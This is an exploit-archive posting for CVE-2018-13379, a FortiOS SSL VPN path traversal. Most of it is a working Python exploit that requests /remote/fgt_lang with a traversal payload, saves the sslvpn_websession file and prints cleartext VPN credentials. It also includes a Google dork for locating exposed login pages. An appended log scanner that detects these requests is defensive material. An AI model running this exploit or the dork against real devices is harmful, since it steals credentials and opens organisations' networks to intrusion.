FortiOS 5.6.7 / 6.0.4 Credential Disclosure

Posted Aug 19, 2019
Authored by Carlos E. Vieira

FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 suffer from a credential disclosure vulnerability.

tags | exploit, info disclosure
advisories | CVE-2018-13379
SHA-256 | b2b3f4a059a819d179d1351df2449ee136c21fac4545ee3a69e597459c9fbae5

# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affects ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379

# Exploit SSLVPN Fortinet - FortiOs
#!/usr/bin/env python
# Written for Python 2 (iterating a file chunk yields one-character strings).
import requests, sys, time
import urllib3
urllib3.disable_warnings()


# Request the SSL VPN web session file through the traversal in the
# lang parameter and save the response to a local .dat file.
def leak(host, port):
    print("[!] Leak information...")
    try:
        url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
        headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
        r=requests.get(url, headers=headers, verify=False, stream=True)
        img=r.raw.read()
        if "var fgt_lang =" in str(img):
            with open("sslvpn_websession_"+host+".dat", 'w') as f:
                f.write(img)
            print("[>] Save to file ....")
            parse(host)
            print("\n")
            return True
        else:
            return False
    except requests.exceptions.ConnectionError:
        return False


def is_character_printable(s):
    return all((ord(c) < 127) and (ord(c) >= 32) for c in s)


def is_printable(byte):
    if is_character_printable(byte):
        return byte
    else:
        return '.'


def read_bytes(host, chunksize=8192):
    print("[>] Read bytes from > " + "sslvpn_websession_"+host+".dat")
    with open("sslvpn_websession_"+host+".dat", "rb") as f:
        while True:
            chunk = f.read(chunksize)
            if chunk:
                for b in chunk:
                    yield b
            else:
                break


# Print the saved file as 61-character rows of printable ASCII,
# skipping rows that contain no printable characters at all.
def parse(host):
    print("[!] Parsing Information...")
    memory_address = 0
    ascii_string = ""
    for byte in read_bytes(host):
        ascii_string = ascii_string + is_printable(byte)
        if memory_address%61 == 60:
            if ascii_string!=".............................................................":
                print(ascii_string)
            ascii_string = ""
        memory_address = memory_address + 1


# The target is treated as vulnerable when the traversal request returns HTTP 200.
def check(host, port):
    print("[!] Check vuln...")
    uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
    try:
        r = requests.get("https://" + host + ":" + port + uri, verify=False)
        if(r.status_code == 200):
            return True
        elif(r.status_code == 404):
            return False
        else:
            return False
    except:
        return False


def main(host, port):
    print("[+] Start exploiting....")
    vuln = check(host, port)
    if(vuln):
        print("[+] Target is vulnerable!")
        bin_file = leak(host, port)
    else:
        print("[X] Target not vulnerable.")


if __name__ == "__main__":

    if(len(sys.argv) < 3):
        print("Use: python {} ip/dns port".format(sys.argv[0]))
    else:
        host = sys.argv[1]
        port = sys.argv[2]
        main(host, port)
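
A defender-side check for the request this script sends, as an added example that is not part of the original advisory or the author's code: it scans access-log lines for /remote/fgt_lang requests whose lang value is not a plain language name. The combined log format (from a proxy or sensor in front of the SSL VPN), the SAFE_LANG rule, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed input: combined-log-format lines from a proxy or sensor in front of the VPN.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Assumption: a legitimate lang value is a short language name such as "en".
SAFE_LANG = re.compile(r'^[A-Za-z0-9_-]{1,16}$')
# Constructed sample lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Aug/2019:10:01:03 +0000] "GET /remote/fgt_lang?lang=en HTTP/1.1" 200 5230 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [19/Aug/2019:10:05:41 +0000] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 200 40960 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [19/Aug/2019:10:06:10 +0000] "GET /remote/fgt_lang?lang=%2F..%2F..%2F..%2F..%2Fdev%2Fcmdb%2Fsslvpn_websession HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]


def fully_unquote(value, rounds=3):
    """Percent-decode several times so multiply-encoded values are normalised."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def find_fgt_lang_traversal(lines):
    """Return one finding per /remote/fgt_lang request with an unsafe lang value."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if fully_unquote(parts.path).rstrip("/") != "/remote/fgt_lang":
            continue
        # parse_qs decodes one layer; fully_unquote removes any further layers.
        for raw in parse_qs(parts.query).get("lang", []):
            lang = fully_unquote(raw)
            if not SAFE_LANG.match(lang):
                findings.append({
                    "ip": m.group("ip"), "time": m.group("ts"), "lang": lang,
                    "served": m.group("status") == "200",  # check() above treats 200 as vulnerable
                    "session_file": "sslvpn_websession" in lang,
                })
    return findings


if __name__ == "__main__":
    print(*find_fgt_lang_traversal(SAMPLE_LOG), sep="\n")
```

A finding with "served" set means the device answered the traversal request with HTTP 200, so credentials for sessions active at that time should be treated as exposed.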